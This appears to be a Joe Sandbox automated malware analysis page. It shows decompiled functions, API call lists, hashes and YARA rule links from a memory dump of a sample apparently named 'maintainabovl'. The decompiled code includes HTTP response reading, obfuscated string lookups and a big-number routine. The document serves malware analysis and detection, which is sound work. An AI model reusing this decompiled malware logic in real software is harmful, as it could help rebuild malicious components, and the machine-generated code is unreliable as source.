Function 01092715 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E01092715(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x109a348; // 0xa6d5a8
					_t5 = _t103 + 0x109b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x1099284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x109a348; // 0xa6d5a8
												_t28 = _t109 + 0x109b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x109a348; // 0xa6d5a8
														_t33 = _t79 + 0x109b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x0109271a
0x01092723
0x01092724
0x01092728
0x0109272e
0x01092734
0x0109273d
0x01092743
0x0109274d
0x0109274f
0x01092755
0x0109275a
0x01092765
0x0109276b
0x01092770
0x01092892
0x01092776
0x01092776
0x01092783
0x01092789
0x0109278f
0x01092793
0x01092799
0x010927a6
0x010927aa
0x010927b0
0x010927b3
0x010927bb
0x010927bc
0x010927c0
0x010927c4
0x010927c7
0x010927ca
0x010927d0
0x010927d9
0x010927df
0x010927e0
0x010927e3
0x010927e4
0x010927e5
0x010927ed
0x010927ee
0x010927ef
0x010927f1
0x010927f5
0x010927f9
0x00000000
0x00000000
0x010927ff
0x01092808
0x0109280e
0x01092818
0x0109281c
0x0109281e
0x0109282b
0x0109282f
0x01092837
0x0109283c
0x0109284e
0x01092850
0x01092856
0x01092856
0x0109285f
0x0109285f
0x01092861
0x01092867
0x01092867
0x0109286a
0x01092870
0x01092873
0x0109287c
0x00000000
0x00000000
0x00000000
0x0109287c
0x010927d0
0x010927ca
0x010927b3
0x01092882
0x01092882
0x01092888
0x01092888
0x0109288e
0x0109288e
0x01092897
0x0109289d
0x0109289d
0x0109275a
0x010928a6

APIs

SysAllocString.OLEAUT32(01099284), ref: 01092765
lstrcmpW.KERNEL32(00000000,0076006F), ref: 01092846
SysFreeString.OLEAUT32(00000000), ref: 0109285F
SysFreeString.OLEAUT32(?), ref: 0109288E

Strings

hqt, xrefs: 01092846

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID: hqt
API String ID: 1885612795-215443068
Opcode ID: 9ea7f31cbe401b1b554f3986a6ffdeed049645982f28330ba75632b482d63dbb
Instruction ID: aec65c80082d56c0017992f9d97f6bf56de7083d823a79393792bf9ba2b166fc
Opcode Fuzzy Hash: 9ea7f31cbe401b1b554f3986a6ffdeed049645982f28330ba75632b482d63dbb
Instruction Fuzzy Hash: 20513A75D0060AEFCF10DFA8C8989AEB7B9FF88704B148598F955EB214D731AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0109466D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0109466D(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x109a160() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x109a174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E01096A51(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x109a160() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E010917ED( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0109692B(_v16);
										if(_t64 == 0) {
											_t64 = E01092A84(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E010917ED( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E010959B3(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x0109466d
0x0109466e
0x01094674
0x0109467f
0x0109467f
0x01094681
0x01096ba7
0x01096bac
0x01096bae
0x01096bb3
0x01096bb4
0x01096bb9
0x01096bba
0x01096bc5
0x01096bf6
0x01096bfb
0x01096cbe
0x01096c01
0x01096c08
0x01096c10
0x01096cbb
0x01096c16
0x01096c1b
0x01096c20
0x01096c25
0x01096cad
0x01096c2b
0x01096c2b
0x01096c2d
0x01096c33
0x01096c34
0x01096c34
0x01096c37
0x01096c3a
0x01096c40
0x01096c45
0x01096c46
0x01096c4b
0x01096c4e
0x01096c59
0x00000000
0x00000000
0x01096c61
0x01096c69
0x01096c75
0x01096c79
0x01096c7b
0x01096c80
0x00000000
0x00000000
0x01096c80
0x01096c79
0x01096c92
0x01096c95
0x01096c9c
0x01096ca7
0x01096ca7
0x00000000
0x01096c82
0x01096c82
0x01096c87
0x01096c89
0x01096c8a
0x01096c8d
0x00000000
0x01096c8d
0x00000000
0x01096c87
0x01096c34
0x01096cae
0x01096cae
0x01096cb4
0x01096cb4
0x01096c10
0x01096bc7
0x01096bcd
0x01096bd5
0x01096bee
0x01096bf0
0x00000000
0x00000000
0x01096bd7
0x01096be1
0x01096be5
0x01096beb
0x00000000
0x01096beb
0x01096be5
0x01096bd5
0x01096cc7
0x01094676
0x01094676
0x0109467d
0x01094688
0x00000000
0x00000000
0x00000000
0x0109467d

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747581D0,00000000,00000000), ref: 01096BAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01096BC7
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01096C40
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01096C5B

Part of subcall function 010959B3: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 010959CA
Part of subcall function 010959B3: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 010959DA
Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01095A0C
Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A31
Part of subcall function 010959B3: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A51

Strings

@MqtNqt, xrefs: 01096BC7, 01096C5B

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
String ID: @MqtNqt
API String ID: 2176574591-2883916605
Opcode ID: c0da6fe6f8ea612a0691adbfeec58833e90d19bf6cffaf8ad394a5325b385e25
Instruction ID: a7d5aa27a0c0c0771ac206f763bbbdd955af68ead124222f5fb249678ac9f9d0
Opcode Fuzzy Hash: c0da6fe6f8ea612a0691adbfeec58833e90d19bf6cffaf8ad394a5325b385e25
Instruction Fuzzy Hash: 72410672A00209AFCF229BA9CC14AAE77F9FF84360F114568F5D5D3150EA32E841AB40

Uniqueness

Uniqueness Score: -1.00%

Function 01093A2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E01093A2A() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x109a3cc; // 0x1b09600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x109a3cc; // 0x1b09600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x109a3cc; // 0x1b09600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x109b827) {
					HeapFree( *0x109a2d8, 0, _t10);
					_t7 =  *0x109a3cc; // 0x1b09600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x01093a2a
0x01093a33
0x01093a43
0x01093a43
0x01093a48
0x01093a4d
0x00000000
0x00000000
0x01093a3d
0x01093a3d
0x01093a4f
0x01093a54
0x01093a58
0x01093a6b
0x01093a71
0x01093a71
0x01093a7a
0x01093a7c
0x01093a80
0x01093a86

APIs

RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01093A33
Sleep.KERNEL32(0000000A), ref: 01093A3D
HeapFree.KERNEL32(00000000), ref: 01093A6B
RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01093A80

Strings

Uqt, xrefs: 01093A6B

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: ab7c80c06835518af6b5f55c89bcb992a115117e9a49a7b1eb3dd4ab70270bc7
Instruction ID: 2a6207eb19fd86eedc5839011a407bf81b994059da64462ca6c6deb34eec63be
Opcode Fuzzy Hash: ab7c80c06835518af6b5f55c89bcb992a115117e9a49a7b1eb3dd4ab70270bc7
Instruction Fuzzy Hash: 5DF0B774B00201DFEB248B69E8A9A2977F4BB44714B04C058F9D2DB2A8C67AA800DB10

Uniqueness

Uniqueness Score: -1.00%

Function 01093AFC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E01093AFC(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x109a348; // 0xa6d5a8
				_t2 = _t22 + 0x109b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x109a2ec >= 5) {
					_t30 = E01093660(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x109a2ec =  *0x109a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E01095E1E(_t50, _t49);
					_t34 = E010917B6(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x109a2ec < 5) {
							 *0x109a2ec =  *0x109a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E01091103();
					HeapFree( *0x109a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x109a3e0; // 0x1b09be0
				if(RtlAllocateHeap( *0x109a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E01091910(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x01093b03
0x01093b0a
0x01093b0e
0x01093b13
0x01093b1e
0x01093b2e
0x01093b7d
0x01093b82
0x01093b82
0x01093b85
0x01093b89
0x01093bc3
0x01093bc3
0x01093bc9
0x01093bd0
0x01093bd0
0x01093b8b
0x01093b8e
0x01093b90
0x01093b9d
0x01093b9f
0x01093ba6
0x01093bdd
0x01093be2
0x01093be4
0x01093be6
0x01093be6
0x00000000
0x01093be4
0x01093ba8
0x01093baf
0x01093bbd
0x00000000
0x01093bbd
0x01093b30
0x01093b4b
0x01093b65
0x00000000
0x01093b65
0x01093b5e
0x00000000

APIs

wsprintfA.USER32 ref: 01093B1E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01093B43

Part of subcall function 01091910: GetTickCount.KERNEL32 ref: 01091927
Part of subcall function 01091910: wsprintfA.USER32 ref: 01091974
Part of subcall function 01091910: wsprintfA.USER32 ref: 01091991
Part of subcall function 01091910: wsprintfA.USER32 ref: 010919B3
Part of subcall function 01091910: wsprintfA.USER32 ref: 010919DA
Part of subcall function 01091910: wsprintfA.USER32 ref: 010919FB
Part of subcall function 01091910: wsprintfA.USER32 ref: 01091A26
Part of subcall function 01091910: HeapFree.KERNEL32(00000000,?), ref: 01091A39

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01093BBD

Strings

Uqt, xrefs: 01093BBD

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uqt
API String ID: 1307794992-2320327147
Opcode ID: 9cd65b957b89eed36ceb5d8b6f817c2fce8633b5cb2eed2ebb9a371f9794db72
Instruction ID: a77a9526725b72eafbea2db7ec977044a551fc9f56f165f358039194775640f1
Opcode Fuzzy Hash: 9cd65b957b89eed36ceb5d8b6f817c2fce8633b5cb2eed2ebb9a371f9794db72
Instruction Fuzzy Hash: 7E316F71600219EFCF21DF68D8A4EDA3BBCFB08354F108066FA859B245D7769644DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01094EF8 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 01094F33
SysFreeString.OLEAUT32(00000000), ref: 01095018

Part of subcall function 01092715: SysAllocString.OLEAUT32(01099284), ref: 01092765

SafeArrayDestroy.OLEAUT32(00000000), ref: 0109506B
SysFreeString.OLEAUT32(00000000), ref: 0109507A

Part of subcall function 01096002: Sleep.KERNEL32(000001F4), ref: 0109604A

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 46af511fdf83ba3120b43f13ce746b7e51e5803fa107573a16d2bbee1fb89332
Instruction ID: 462f0cac9ee9a3e81585511c8c7a0a80ddc9d3dd1ff452cf10225af8483a77b5
Opcode Fuzzy Hash: 46af511fdf83ba3120b43f13ce746b7e51e5803fa107573a16d2bbee1fb89332
Instruction Fuzzy Hash: C6517D3550060AAFDB12CFA9C864ADEBBB5BFC8740B148469F694DB210DB32ED05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010923D6 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E010923D6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E01096B54(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E01092700(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01097455(_t101,  &_v428, _a8, _t96 - _t81);
					E01097455(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E01092700(_t101, 0x109a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E01092700(_a16, _a4);
						E01094596(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0109821A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L01098214();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E01093C88(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E01094780(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E01096196(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x109a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x010923d9
0x010923e5
0x010923eb
0x010923f0
0x010923f4
0x01092566
0x0109256a
0x0109256a
0x010923fa
0x010923fe
0x01092402
0x01092405
0x01092410
0x01092416
0x0109241b
0x0109241e
0x01092438
0x01092447
0x01092453
0x0109245d
0x01092462
0x01092464
0x01092467
0x0109251e
0x01092524
0x01092535
0x01092548
0x0109255e
0x00000000
0x01092563
0x01092470
0x01092477
0x0109247b
0x01092481
0x01092483
0x01092485
0x01092487
0x01092489
0x01092493
0x01092498
0x0109249a
0x0109249c
0x0109249d
0x0109249e
0x0109249f
0x010924a6
0x010924ad
0x010924b0
0x010924b0
0x0109247d
0x0109247d
0x0109247d
0x010924b8
0x010924c0
0x010924cc
0x010924d1
0x010924d1
0x010924d6
0x00000000
0x00000000
0x010924d8
0x010924db
0x010924e8
0x00000000
0x00000000
0x010924ea
0x010924ea
0x010924f7
0x010924d1
0x010924d6
0x00000000
0x00000000
0x00000000
0x010924d6
0x01092501
0x01092504
0x01092507
0x0109250e
0x0109250e
0x0109251b
0x00000000
0x0109251b
0x01092407
0x0109240b
0x0109240c
0x0109240e
0x00000000
0x00000000
0x00000000
0x0109240e
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 01092489
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0109249F
memset.NTDLL ref: 01092548
memset.NTDLL ref: 0109255E

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: d3fba248f9503f07dcbc97d12160bcdd631804a29435e6c23a14d4f1ddc1193f
Instruction ID: ad0132a92c91110fddb91ef1affd7e79580d50a04c020d1683e3cd285f4a287a
Opcode Fuzzy Hash: d3fba248f9503f07dcbc97d12160bcdd631804a29435e6c23a14d4f1ddc1193f
Instruction Fuzzy Hash: D941C47160021ABBDF10DF68CCA0BEE77B5EF55310F008569F999A7281DB70AE54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01094689 Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01094689(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x109a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x109a348; // 0xa6d5a8
				_t3 = _t8 + 0x109b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E01096FEF(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x109a34c, 1, 0, _t30);
					E0109692B(_t30);
				}
				_t12 =  *0x109a2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E010931AB() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E01097066(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x109a124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E01095F7C(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x0109468a
0x01094691
0x0109469b
0x0109469f
0x010946a5
0x010946b4
0x010946bb
0x010946bf
0x010946d1
0x010946d3
0x010946d3
0x010946d8
0x010946df
0x01094736
0x01094736
0x0109473c
0x0109473e
0x0109473e
0x01094748
0x0109474c
0x0109475e
0x0109475e
0x01094762
0x01094768
0x01094768
0x00000000
0x010946f8
0x010946fd
0x01094705
0x01094709
0x0109470d
0x0109470d
0x0109471a
0x0109471e
0x01094722
0x01094777
0x0109477d
0x0109477d
0x01094730
0x01094734
0x0109476b
0x0109476d
0x01094770
0x01094770
0x00000000
0x0109476d
0x01094734
0x00000000
0x0109471e

APIs

Part of subcall function 01096FEF: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,01B09DD8,00000000,?,?,69B25F44,00000005,0109A00C,4D283A53,?,?), ref: 01097025
Part of subcall function 01096FEF: lstrcpy.KERNEL32(00000000,00000000), ref: 01097049
Part of subcall function 01096FEF: lstrcat.KERNEL32(00000000,00000000), ref: 01097051

CreateEventA.KERNEL32(0109A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 010946CA

